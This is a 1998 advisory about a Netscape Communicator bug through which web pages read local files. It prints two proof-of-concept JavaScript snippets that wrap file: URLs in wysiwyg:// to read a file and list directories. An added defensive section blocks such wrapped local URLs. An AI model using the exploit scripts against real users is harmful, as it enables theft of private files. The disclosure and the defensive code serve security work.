Netscape browser bug allows reading of local files.
8 Dec. 1998
Summary
Netscape Communicator for Windows and UNIX was found to be vulnerable to a bug that allows locally stored files to be read from the user's computer without the user's authorization and knowledge.
The bug allows malicious JavaScript and Java applets to read local files and browse through directories. The file name or directory name doesn't have to be known, because a JavaScript can be made to recursively send all of the hard disk's content back to the malicious web page's web server.
The source code of the JavaScript follows:
sl=window.open("wysiwyg://1/file:///C|/");
sl2=sl.window.open();
sl2.location="javascript:s='<SCRIPT>b=\"Here is the beginning of your file: \";var f = new java.io.File(\"C:\\\\\\\\test.txt\");var fis = new java.io.FileInputStream(f); i=0; while ( ((a=fis.read()) != -1) && (i<100) ) { b += String.fromCharCode(a);i++;}alert(b);</'+'SCRIPT>'";
The exploit is based on the idea that JavaScript and Java applets that run off the local hard disk should be fully "trusted" and granted full access to the local computer.
Another example that was provided by Terence Christopher Haddock follows:
sl=window.open("wysiwyg://1/file://C|/");
sl2=sl.window.open();
sl2.location="javascript:"+
"b=\"Here is the files in your root directory:\";"+
"var f=new java.io.file(\"C:\\\\\");"+
"var files=f.list();"+
"for (var x=0;x<files.length;x++){"+
"b+=files[x]+\"\n\""+
"};"+
"alert(b);";
This more advanced version has a "search" algorithm that enables the malicious JavaScript to search (recursively) for a specific file on the local hard disk. The only disadvantage of this script is that it opens a large number of windows, showing each directory it traversed into. This might be avoided by creating these windows inside frames, instead of inside windows.
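Both scripts above reach the trusted local context by wrapping a file: URL inside wysiwyg://1/. The following is an added example, not part of the original advisory and not Netscape's code: a navigation check that classifies a target by its innermost scheme, so a wrapped file: URL opened from a web page is refused. The wrapper format is taken from the URLs shown above; the function names, the policy and the sample URLs are assumptions, and URLs are assumed to be absolute.

```javascript
// Added example (hypothetical names): decide whether a page may open a target
// URL, judging the target by its innermost scheme rather than its outer one.
const LOCAL_SCHEMES = new Set(["file"]);
// Wrapper format as seen on this page: wysiwyg://<number>/<inner URL>
const WRAPPER = /^wysiwyg:\/\/\d+\//i;

// Strip any number of nested wysiwyg wrappers and return the inner URL.
function unwrap(url) {
  let u = String(url).trim();
  let depth = 0;
  while (WRAPPER.test(u)) {
    u = u.replace(WRAPPER, "");
    if (++depth > 16) throw new Error("too many nested wrappers");
  }
  return u;
}

// Lower-cased scheme of the innermost URL, or null if none can be parsed.
function schemeOf(url) {
  const m = /^([a-z][a-z0-9+.-]*):/i.exec(unwrap(url));
  return m ? m[1].toLowerCase() : null;
}

// Refuse when a non-local page asks to open local content, wrapped or not.
function allowNavigation(openerUrl, targetUrl) {
  const opener = schemeOf(openerUrl);
  const target = schemeOf(targetUrl);
  if (target === null) return false; // nothing usable inside the wrapper
  if (LOCAL_SCHEMES.has(target) && !LOCAL_SCHEMES.has(opener)) return false;
  return true;
}

// Constructed sample navigations: [opener, target]
const SAMPLES = [
  ["http://example.test/page.html", "wysiwyg://1/file:///C|/"],
  ["http://example.test/page.html", "http://example.test/next.html"],
  ["file:///C|/index.html", "file:///C|/other.html"],
];

function evaluateSamples() {
  return SAMPLES.map(([opener, target]) => allowNavigation(opener, target));
}

console.log(evaluateSamples());
```

A check that looks only at the outer scheme sees "wysiwyg" and never notices the file: URL inside, which is the gap the unwrapping step closes.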